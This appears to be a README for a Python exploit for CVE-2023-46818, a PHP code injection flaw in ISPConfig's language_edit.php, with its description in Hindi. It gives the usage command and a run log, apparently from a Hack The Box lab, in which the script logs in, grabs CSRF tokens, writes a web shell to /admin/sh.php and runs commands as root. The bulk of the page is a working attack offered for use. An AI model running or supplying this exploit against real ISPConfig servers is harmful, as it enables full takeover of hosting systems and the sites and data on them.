
CVE-2023-46818 Python3 Exploit for ISPConfig <= 3.2.11 (language_edit.php) PHP Code Injection Vulnerability
यह पायथन शोषण स्क्रिप्ट ISPConfig के records POST पैरामीटर में /admin/language_edit.php पर एक सुरक्षा कमजोरी को लक्षित करता है, जो ठीक से स्वच्छ नहीं किया गया है। यह एक प्रमाणित व्यवस्थापक को मनमाना PHP कोड इंजेक्ट और निष्पादित करने की अनुमति देता है।
संस्करण 3.2.11 और पिछले संस्करण।
python3 CVE-2023-46818.py <URL> <Username> <Password>
┌──(motoh4ck3r㉿kali)-[~/HTB/Linux/nocturnal]
└─$ python3 CVE-2023-46818.py http://127.0.0.1:8081 motoh4ck3r broombroom
[+] Logging in with username 'motoh4ck3r' and password 'broombroom'
[+] Login successful!
[*] Fetching CSRF tokens...
[+] CSRF ID: language_edit_92017c65f0bcba0f230f5cc1
[+] CSRF Key: 7d06eed7d23c29e5c9633920a8122339d91373e8
[+] Injecting shell payload...
[+] Shell written to: http://127.0.0.1:8081/admin/sh.php
[+] Launching shell...
ispconfig-shell# hostname & whoami & id
nocturnal
root
uid=0(root) gid=0(root) groups=0(root)
ispconfig-shell#
https://seclists.org/fulldisclosure/2023/Dec/2
इस खोज के लिए एगिडियो रोमानो को धन्यवाद।